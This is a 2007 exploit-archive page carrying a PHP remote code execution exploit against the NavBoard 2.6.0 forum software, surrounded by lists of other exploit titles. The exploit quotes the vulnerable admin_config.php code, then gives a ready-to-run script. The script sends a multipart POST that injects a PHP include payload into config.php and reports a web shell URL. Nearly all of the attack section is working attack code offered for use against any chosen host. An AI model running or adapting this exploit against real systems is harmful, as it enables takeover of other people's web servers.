exploits , vulnerabilities , articles , NavBoard 2.6.0 Remote Code Execution Exploit

2007-04-12 MyBulletinBoard (MyBB) <= 1.2.2 (CLIENT-IP) SQL Injection Exploit
2007-04-08 PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit
2007-04-04 CyBoards PHP Lite 1.21 (script_path) Remote File Include Exploit
2007-04-03 MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit
2007-03-31 JSBoard 2.0.10 (login.php table) Local File Inclusion Vulnerability
2007-05-23
NavBoard 2.6.0 Remote Code Execution Exploit
Rated as : High Risk

<?php

/*
        \|///
      \  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
      (       ) /
      _)     (_/

---------------------------------------------------------------------

[!] Portal        :   NavBoard 2.6.0
[!] Download      :   http://www.sourceforge.net/projects/navboard
[!] Type          :   Remote Code Execution Exploit

---------------------------------------------------------------------
*/

/*
Vuln Code :

[Code]

if(!$editconfig){

 tableheader1();
 print "<form action="admin_config.php"
method=post>";
 print "<input type=hidden name="editconfig"
value="1" size=40>"; 
 print "<tr><td class="tableheadercell"
colspan="2"><span class="textlarge">";
 print "<b>Main forum settings</b>";
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Board Title";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="boardtitle"
value="$configarray[0]" size=40
class="forminput">";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Admin email address (blank will not display)";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="adminemail"
value="$configarray[35]" size=40
class="forminput">";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Main website address (NOT forum address, blank will display
forum address)";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="mainwebsite"
value="$configarray[36]" size=40
class="forminput">";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Display text title instead of graphic logo for faster
loading<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 if($configarray[34]=="on")
 {print "<input type=checkbox name="textlogo"
class="forminput" checked>";}
 else{print "<input type=checkbox name="textlogo"
class="forminput">";}
 print "</span></td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 
 print "<b>Forums</b><br>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Max levels of subforums to display on one page (less will
make for faster loading)<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="maxsubforumdisplay"
value="$configarray[27]" size=2
class="forminput">";
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Don't find forum reply count on the fly, recount during
posting<br>(faster forum page, may slow posting slightly)";
 print "</span></td><td class="tablecell2"
width="50%">";
 if($configarray[42]=="on"){
 print "<input type=checkbox name="dontscanreplycount"
class="forminput" checked>";
 }else{print "<input type=checkbox
name="dontscanreplycount"
class="forminput">";}
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Forum/Thread indenting amount<br>Percentage of title
cell used for indent spaing";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="indentspacing"
value="$configarray[44]" size=2
class="forminput">%";
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 
 print "<b>Posts</b><br>";
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Seconds before user may add another post (flood
control)";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="postfloodcontrolsec"
value="$configarray[37]" size=2
class="forminput">";
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Amount of nested bbcodes allowed<br>(how many times a
bbcode tag can be put over itself) 3 is default";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="nestedbbcodes"
value="$configarray[43]" size=2
class="forminput">";
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Show names for user levels instead of
imageicons:<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 if($configarray[45]=="on"){
 print "<input type=checkbox name="userlevelnames"
class="forminput" checked>";
 }else{
 print "<input type=checkbox name="userlevelnames"
class="forminput">";
 }
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Show all edits instead of only last edit on
posts<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 if($configarray[46]=="on"){
 print "<input type=checkbox name="showalledits"
class="forminput" checked>";
 }else{
 print "<input type=checkbox name="showalledits"
class="forminput">";
 }
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 
 print "<b>Registration</b><br>";
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Seconds before another account can be registered (flood
control)<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="regfloodcontrolsec"
value="$configarray[38]" size=2
class="forminput">";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Method of registration<br>";
 print "NOTE: Mailing in php must be setup correctly on your server
to work with email confirmation";
 print "</span></td><td class="tablecell2"
width="50%"><span class="textlarge">";
 if($configarray[39]=="on"||$configarray[39]==""){
 print "<input type=radio name="registration"
value="on" class="forminput" checked> ";
 }else{
 print "<input type=radio name="registration"
value="on" class="forminput"> ";
 }
 print "Allowed<br>";
 if($configarray[39]=="confirm"){
 print "<input type=radio name="registration"
value="confirm" class="forminput" checked> ";
 }else{
 print "<input type=radio name="registration"
value="confirm" class="forminput"> ";
 }
 print "Email confirmed<br>";
 if($configarray[39]=="approve"){
 print "<input type=radio name="registration"
value="approve" class="forminput" checked> ";
 }else{
 print "<input type=radio name="registration"
value="approve" class="forminput"> ";
 }
 print "Admin approved";
 print "</span></td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Profiles</b>";
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Allow duplicate display names<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 if($configarray[32]=="on"){
 print "<input type=checkbox name="allowdupdisplay"
class="forminput" checked>";
 }else{
 print "<input type=checkbox name="allowdupdisplay"
class="forminput">";
 }
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Display name changing<br>";
 print "</span></td><td class="tablecell2"
width="50%"><span class="textlarge">";
 if($configarray[41]=="off"){
 print "<input type=radio name="displaychange"
value="off" class="forminput" checked> ";
 }else{
 print "<input type=radio name="displaychange"
value="off" class="forminput"> ";
 }
 print "Not allowed<br>";
 if($configarray[41]=="on"||$configarray[41]==""){
 print "<input type=radio name="displaychange"
value="on" class="forminput" checked> ";
 }else{
 print "<input type=radio name="displaychange"
value="on" class="forminput"> ";
 }
 print "Allowed<br>";
 if($configarray[41]=="approve"){
 print "<input type=radio name="displaychange"
value="approve" class="forminput" checked> ";
 }else{
 print "<input type=radio name="displaychange"
value="approve" class="forminput"> ";
 }
 print "Admin approved";
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Default time format (php <a
href="http://www.php.net/manual/en/function.date.php"
target="_new">date</a> format) ";
 print "Recommended: n-j-Y h:iA <br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="defaulttime"
value="$configarray[33]" size=40
class="forminput">";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Max people on individual users buddy lists";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="buddylistmax"
value="$configarray[28]" size=2
class="forminput">";
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Avatars</b><br>";
 print "</span></td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Avatar file size limit (bytes)<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="avatarfilesize"
value="$configarray[9]" size=20
class="forminput"><br>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Avatar dimensions limit (height)x(width)<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="avatardimension"
value="$configarray[10]" size=20
class="forminput"><br>";
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Attachments</b>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Allowed attachment extensions (separated by commas) (blank
would allow no attachments)<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="allowedattachext"
value="$configarray[22]" size=40
class="forminput">";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Max size of attachments (in bytes)<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="maxattachsize"
value="$configarray[23]" size=20
class="forminput">";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Max total size of all attachments (in
bytes)<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="maxtotalattachsize"
value="$configarray[31]" size=20
class="forminput">";
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Polls</b>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Max poll options<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="maxpolloptions"
value="$configarray[24]" size=2
class="forminput">";
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Theme</b><br>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Default theme<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 $themesarray=listdirs("themes");
 print "<select size=1 name="defaulttheme" size=40
class="forminput">n";
 for($n=0;$n<count($themesarray);$n++){

  if($themesarray[$n]==$configarray[12]){
  print "<option value="$themesarray[$n]"
selected>$themesarray[$n]</option>";
  }else{
  print "<option
value="$themesarray[$n]">$themesarray[$n]</option>";
  }

 }
 print "</select>";
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Online users</b><br>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Seconds of inactivity before user is removed from online list
(300seconds=5minutes)<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="inactivityseconds"
value="$configarray[13]" size=2
class="forminput">";
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Page settings</b>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Threads to show per page in forum<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="threadperpage"
value="$configarray[7]" size=2
class="forminput"><br>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Posts to show per page in thread<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="postperpage"
value="$configarray[8]" size=2
class="forminput"><br>";
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Max character settings</b><br>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Max total characters in body of posts<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="maxcharsbody"
value="$configarray[18]" size=5
class="forminput"><br>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Max total characters in subject of posts<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="maxcharssubject"
value="$configarray[25]" size=5
class="forminput"><br>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Max total characters in signatures<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="maxcharssigs"
value="$configarray[19]" size=5
class="forminput"><br>";
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Enabling/Disabling</b>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Allow HTML in posts:<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 if($configarray[14]=="allowhtml"){
 print "<input type=checkbox name="html"
class="forminput" checked>";
 }else{
 print "<input type=checkbox name="html"
class="forminput">";
 }
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Enable GZ Compression:<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 if($configarray[21]=="disablegz"){
 print "<input type=checkbox name="gzcompress"
class="forminput">";
 }else{
 print "<input type=checkbox name="gzcompress"
class="forminput" checked>";
 } 
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Private Messaging</b><br>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Max total size of pms per user (bytes)<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="maxpmsize"
value="$configarray[29]" size=10
class="forminput"><br>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Max total number of pms per user<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="maxpmnumber"
value="$configarray[30]" size=10
class="forminput"><br>";
 print "</td></tr><tr><td
class="tableheadercell" colspan="2"><span
class="textlarge">";
 print "<b>Board Closing</b>";
 print "</td></tr><tr><td
class="tablecell1" width="50%"><span
class="textlarge">";
 print "Entering info here will cause the entire bulletin board to be
closed<br>";
 print "This is the message that shows up when the board is
closed<br>";
 print "</span></td><td class="tablecell2"
width="50%">";
 print "<input type=text name="boardclosing"
value="$configarray[40]" size=60
class="forminput"><br>";
 print "</td></tr><tr><td
class="tablecell2" colspan="2"><span
class="textlarge">";
 print "<input type=submit name="submit"
value="Update" class="formbutton">";
 print "</span>";
 print "</td>";
 print "</form>";
 print "</tr>";
 print "</table>";
 }

 if($editconfig){

 $boardtitle=stripslashes($boardtitle);
 $boardtitle=htmlentities($boardtitle);
 writedata("$maindatadir/config.php",$boardtitle,0);
 writedata("$maindatadir/config.php",$threadperpage,7);
 writedata("$maindatadir/config.php",$postperpage,8);
 writedata("$maindatadir/config.php",$avatarfilesize,9);
 writedata("$maindatadir/config.php",$avatardimension,10);
 writedata("$maindatadir/config.php",$defaulttheme,12);
 writedata("$maindatadir/config.php",$inactivityseconds,13);
 if($html=="on"){
 writedata("$maindatadir/config.php","allowhtml",14);
 }else{
 writedata("$maindatadir/config.php","denyhtml",14);
 }
 writedata("$maindatadir/config.php",$maxcharsbody,18);
 writedata("$maindatadir/config.php",$maxcharssigs,19);
 if($gzcompress=="on"){
 writedata("$maindatadir/config.php","enablegz",21);
 }else{
 writedata("$maindatadir/config.php","disablegz",21);
 }
 writedata("$maindatadir/config.php",$allowedattachext,22);
 writedata("$maindatadir/config.php",$maxattachsize,23);
 writedata("$maindatadir/config.php",$maxpolloptions,24);
 writedata("$maindatadir/config.php",$maxcharssubject,25);
 writedata("$maindatadir/config.php",$maxsubforumdisplay,27);
 writedata("$maindatadir/config.php",$buddylistmax,28);
 writedata("$maindatadir/config.php",$maxpmsize,29);
 writedata("$maindatadir/config.php",$maxpmnumber,30);
 writedata("$maindatadir/config.php",$maxtotalattachsize,31);
 writedata("$maindatadir/config.php",$allowdupdisplay,32);
 writedata("$maindatadir/config.php",$defaulttime,33);
 writedata("$maindatadir/config.php",$textlogo,34);
 writedata("$maindatadir/config.php",$adminemail,35);
 writedata("$maindatadir/config.php",$mainwebsite,36);
 writedata("$maindatadir/config.php",$postfloodcontrolsec,37);
 writedata("$maindatadir/config.php",$regfloodcontrolsec,38);
 writedata("$maindatadir/config.php",$registration,39);
 writedata("$maindatadir/config.php",$boardclosing,40);
 writedata("$maindatadir/config.php",$displaychange,41);
 

if($configarray[42]!=="on"&&$dontscanreplycount=="on"){//if
turning on for first time, make a recount
  for($n=0;$n<count($forumarray);$n++){
  $topicarray=listdirs("$configarray[2]/$forumarray[$n]");
  $replies=0;
   for($m=0;$m<count($topicarray);$m++){
   
$postarray2=listfiles("$configarray[2]/$forumarray[$n]/$topicarray[$m]");
    $replies+=count($postarray2)-1;
   }
  writedata("$configarray[2]/$forumarray[$n].php",$replies,11);
  }
 writedata("$maindatadir/config.php",$dontscanreplycount,42);
 }else{
 writedata("$maindatadir/config.php",$dontscanreplycount,42);
 }
 
 writedata("$maindatadir/config.php",$nestedbbcodes,43);
 writedata("$maindatadir/config.php",$indentspacing,44);
 writedata("$maindatadir/config.php",$userlevelnames,45);
 writedata("$maindatadir/config.php",$showalledits,46);


[/Code]
*/

if ($argc<2) {
print_r('
-----------------------------------------------------------------------------

Usage: php '.$argv[0].' Host Path Options
host:       Target server (ip/hostname)
path:       Path To Folder

Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy

Example:
php '.$argv[0].' 127.0.0.1 /Forum/ -P1.1.1.1:80

-----------------------------------------------------------------------------
');

die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="rn";
$exa.="rn";}
  }
 return $exa."rn".$result;
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacket($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to
".$parts[0].":".$parts[1]." proxy...rn";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=7; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

/*Data*/

$data.='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="editconfig"


-----------------------------7d6224c08dc
Content-Disposition: form-data; name="boardtitle"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="threadperpage"

www";include "$shell";//
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="postperpage"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatarfilesize"

11
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatardimension"

123
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="defaulttheme"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="inactivityseconds"

#CCFF00
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="html"

on
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharsbody"

111
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharssigs"

11122
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="gzcompress"

on
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="allowedattachext"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxattachsize"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpolloptions"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharssubject"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxsubforumdisplay"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="buddylistmax"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpmsize"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpmnumber"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxtotalattachsize"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="allowdupdisplay"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="defaulttime"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="textlogo"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="adminemail"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="mainwebsite"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="postfloodcontrolsec"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="regfloodcontrolsec"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="registration"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="boardclosing"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="displaychange"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="replies"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="dontscanreplycount"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="nestedbbcodes"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="indentspacing"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="userlevelnames"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="showalledits"

red
-----------------------------7d6224c08dc
';


/*Echo Header*/
echo "[!] NavBoard 2.6.0rn";
echo "[!] Powered By Y! Underground Grouprn";
echo "[!] Vuln And Coded By Dj7xplrn";

/*Sending Data*/
$packet ="POST ".$path."admin_config.php HTTP/1.0rn";
$packet.="Content-Type: multipart/form-data;
boundary=---------------------------7d6224c08dcrn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Host: ".$host."rn";
$packet.="Accept-Language: enrn";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT
5.1)rn";
$packet.="Connection: Closernrn";
$packet.=$data;
sendpacket($packet);
sleep(2);
Echo "[!] Shell :
http://".$host.$path."data/config.php?shell=Evil Textrn";

?>

securitydot.net - 2007-05-23
Exploits - newest 10 RSS | More
2007-06-15 38587 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20177 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 24024 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20119 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12396 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10545 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12767 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10610 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22795 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11105 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit